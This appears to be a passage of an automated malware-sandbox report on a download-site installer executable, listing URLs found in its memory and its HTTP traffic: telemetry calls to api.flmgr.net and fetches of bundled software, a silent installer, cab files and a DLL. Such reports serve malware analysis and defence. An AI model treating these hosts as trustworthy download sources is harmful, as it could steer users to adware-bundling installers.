Source: _____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426380144.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426159389.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425825661.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426103185.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426072751.00000000064FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: _____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/4
Source: _____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425825661.00000000064FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/=
Source: _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/A
Source: _____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426232518.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426159389.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425825661.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426103185.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426072751.00000000064FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/J
Source: _____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426232518.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426159389.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425825661.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426103185.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426072751.00000000064FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/P
Source: _____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: _____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426232518.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426159389.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425825661.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426103185.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426072751.00000000064FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a
Source: _____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426232518.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426380144.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426159389.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425825661.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426103185.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426072751.00000000064FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425825661.00000000064FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/4
Source: _____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425825661.00000000064FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/s
Source: _____NCM______2_10042231.exe, 00000000.00000003.424265906.00000000064F3000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
Source: _____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/x
Source: _____NCM______2_10042231.exe, 00000000.00000003.421433465.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421630345.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421503766.000000000650B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: _____NCM______2_10042231.exe, 00000000.00000003.421372809.000000000650B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com/
Source: _____NCM______2_10042231.exe, 00000000.00000003.421466698.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421401597.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421485048.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421433465.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421503766.000000000650B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com;
Source: _____NCM______2_10042231.exe, 00000000.00000003.421607485.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421532102.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421466698.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421401597.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421555534.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421583290.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421485048.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421433465.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421630345.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421503766.000000000650B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comd
Source: _____NCM______2_10042231.exe, 00000000.00000003.421372809.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.421348692.000000000650B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comn-u
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426072751.00000000064FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
Source: _____NCM______2_10042231.exe, 00000000.00000003.422331717.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: _____NCM______2_10042231.exe, 00000000.00000003.422331717.00000000064FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr(
Source: _____NCM______2_10042231.exe, 00000000.00000003.422331717.00000000064FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr=
Source: _____NCM______2_10042231.exe, 00000000.00000003.422331717.00000000064FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krx
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.422155377.000000000650B000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423250916.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
Source: _____NCM______2_10042231.exe, 00000000.00000003.421841574.000000000650B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comc
Source: _____NCM______2_10042231.exe, 00000000.00000003.423157317.000000000650B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comn
Source: _____NCM______2_10042231.exe, 00000000.00000003.422155377.000000000650B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.como
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
Source: _____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423601209.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423663375.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423537700.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: _____NCM______2_10042231.exe, 00000000.00000003.423601209.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423663375.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423537700.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnltE
Source: _____NCM______2_10042231.exe, 00000000.00000003.423601209.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423537700.0000000006525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
Source: _____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zlib.net/D
Source: _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.pdfxd.com/download/pdf/XDInstaller_3.1.5.8_yundong-1.exe
Source: _____NCM______2_10042231.exe, 00000000.00000003.661038246.0000000006227000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.pdfxd.com/download/pdf/XDInstaller_3.1.5.8_yundong-1.exeW
Source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: _____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: _____NCM______2_10042231.exe, 00000000.00000003.599752351.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734322356.00000000061A0000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.593218082.00000000061FE000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.593218082.0000000006207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.ihsdus.cn/down/2022down/1/05/wyyyyncmwjzh.rar?timestamp=64cd2bdd&auth_key=711023fa9
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/1600.
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/4467
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/v8/v8/wiki/Debugging-Protocol
Source: _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://groups.google.com/forum/?pli=1#
Source: _____NCM______2_10042231.exe, 00000000.00000003.661038246.0000000006227000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstararch.gstarcad.cn/2023/2D/230529/GstarCAD2023_ZH_x64.exe
Source: _____NCM______2_10042231.exe, 00000000.00000003.661038246.0000000006227000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstararch.gstarcad.cn/2023/2D/230529/GstarCAD2023_ZH_x64.exev1
Source: _____NCM______2_10042231.exe, 00000000.00000003.575430988.00000000061B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.onlinedown.net/down
Source: _____NCM______2_10042231.exe, 00000000.00000003.575430988.00000000061B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.onlinedown.net/download/202201/08473
Source: _____NCM______2_10042231.exe, 00000000.00000003.575226837.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599905174.000000000491C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.660352806.000000000491C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.733942259.000000000491C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.600413657.000000000491C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661328262.000000000491C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.575430988.00000000061B3000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.593264592.000000000491C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.575226837.000000000491C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.onlinedown.net/download/202201/084735-61d4eaa756820.jpg
Source: _____NCM______2_10042231.exe, 00000000.00000003.575430988.00000000061B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.onlinedown.net/download/202201/084735-61d4eaa756820.jpg21769
Source: _____NCM______2_10042231.exe, 00000000.00000003.575430988.00000000061B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.onlinedown.net/download/202201/084735-61d4eaa756820.jpgp
Source: _____NCM______2_10042231.exe, 00000000.00000002.734322356.00000000061A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pc-package.wpscdn.cn/wps/dow
Source: _____NCM______2_10042231.exe, 00000000.00000002.734322356.00000000061A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pc-package.wpscdn.cn/wps/download/W.P.S.20.3001.
Source: _____NCM______2_10042231.exe, 00000000.00000002.733702466.0000000004853000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734510334.0000000006277000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.733702466.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734322356.000000000620C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.660996478.0000000006271000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661038246.0000000006227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pc-package.wpscdn.cn/wps/download/W.P.S.20.3001.exe
Source: _____NCM______2_10042231.exe, 00000000.00000003.661015928.000000000625D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pc-package.wpscdn.cn/wps/download/W.P.S.20.3001.exel&
Source: _____NCM______2_10042231.exe, 00000000.00000003.661015928.000000000625D000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734490139.0000000006261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://union.2345cdn.n
Source: _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://union.2345cdn.net/union3422_pic/2345pic_lm_511196_v10.10_silent.exe
Source: _____NCM______2_10042231.exe, 00000000.00000003.661015928.000000000625D000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734490139.0000000006261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://union.2345cdn.nows
Source: _____NCM______2_10042231.exe, 00000000.00000002.734322356.00000000061A0000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.575430988.00000000061B3000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.575226837.00000000048FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.593443636.00000000061F2000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.593264592.00000000048FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onlinedown.net/
Source: _____NCM______2_10042231.exe, 00000000.00000003.599814629.00000000061B2000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599752351.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734322356.00000000061A0000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.575430988.00000000061B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onlinedown.net/7
Source: _____NCM______2_10042231.exe, 00000000.00000003.599814629.00000000061B2000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599752351.00000000061A3000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734322356.00000000061A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onlinedown.net/Q
Source: _____NCM______2_10042231.exe, 00000000.00000003.593264592.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.575226837.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.600413657.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599905174.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.733702466.000000000486C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onlinedown.net/api/ryapi?webid=2&softid=10042231&token=f4c629206dca1541c85c21d5d30ac4c7
Source: _____NCM______2_10042231.exe, 00000000.00000003.575430988.00000000061B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onlinedown.net/iopdfbhjl/10042231?mo
Source: _____NCM______2_10042231.exe, 00000000.00000003.593264592.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.575226837.000000000486C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onlinedown.net/iopdfbhjl/10042231?module=download&t=website&v=20230805004821
Source: _____NCM______2_10042231.exe, 00000000.00000003.593264592.000000000486C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onlinedown.net/iopdfbhjl/10042231?module=download&t=website&v=20230805004821k
Source: _____NCM______2_10042231.exe, 00000000.00000003.593264592.000000000486C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onlinedown.net/iopdfbhjl/10042231?module=download&t=website&v=20230805004821ll
Source: _____NCM______2_10042231.exe, 00000000.00000003.593264592.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.575226837.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.600413657.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599905174.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.733702466.000000000486C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onlinedown.net/iopdfbhjl/10042231?module=download&t=website&v=20230805004821s=1&Err=0D
Source: _____NCM______2_10042231.exe, 00000000.00000003.575430988.00000000061B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.onlinedown.net/x2
Source: unknownDNS traffic detected: queries for: api.flmgr.net
Source: C:\Users\user\AppData\Local\winManager\FLMgrTray.exeCode function: 23_2_00186EF0 InternetReadFile,_CxxThrowException,_CxxThrowException,23_2_00186EF0
Source: global trafficHTTP traffic detected: GET /api/ryapi?webid=2&softid=10042231&token=f4c629206dca1541c85c21d5d30ac4c7 HTTP/1.1Cache-Control: no-storeConnection: Keep-AliveExpires: 0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Host: www.onlinedown.net
Source: global trafficHTTP traffic detected: GET /download/202201/084735-61d4eaa756820.jpg HTTP/1.1Host: img.onlinedown.netAccept: */*Accept-Encoding: deflate, gzipReferer: https://www.onlinedown.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
Source: global trafficHTTP traffic detected: GET /down/2022down/1/05/wyyyyncmwjzh.rar?timestamp=64cd2bdd&auth_key=711023fa949fb7fcd92687a16aff0b79 HTTP/1.1Host: download.ihsdus.cnUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36Accept: */*Referer: https://www.onlinedown.net/
Source: global trafficHTTP traffic detected: GET /gf/KitTip/KitTipConf.cab HTTP/1.1User-Agent: BeaconHost: dl.360safe.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /gf/KitTip/KitTip.cab HTTP/1.1User-Agent: BeaconHost: dl.360safe.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /log/client/site_soft?Action=open&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0 HTTP/1.1Cache-Control: no-storeConnection: Keep-AliveExpires: 0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Host: api.flmgr.net
Source: global trafficHTTP traffic detected: GET /log/client/install?Action=open&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&IsUpdgade=0&OldVer= HTTP/1.1Cache-Control: no-storeConnection: Keep-AliveExpires: 0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Host: api.flmgr.net
Source: global trafficHTTP traffic detected: GET /log/client/site_soft?Action=down_start&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0 HTTP/1.1Cache-Control: no-storeConnection: Keep-AliveExpires: 0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Host: api.flmgr.net
Source: global trafficHTTP traffic detected: GET /log/client/site_soft?Action=down_suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0 HTTP/1.1Cache-Control: no-storeConnection: Keep-AliveExpires: 0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Host: api.flmgr.net
Source: global trafficHTTP traffic detected: GET /log/client/install?Action=suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&IsUpdgade=0&OldVer= HTTP/1.1Cache-Control: no-storeConnection: Keep-AliveExpires: 0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36Host: api.flmgr.net
Source: global trafficHTTP traffic detected: GET /kit/KitTip.dll HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; )Host: static.flmgr.net
Source: global trafficHTTP traffic detected: GET /green/1.2.32.1.png HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; )Host: static.flmgr.net
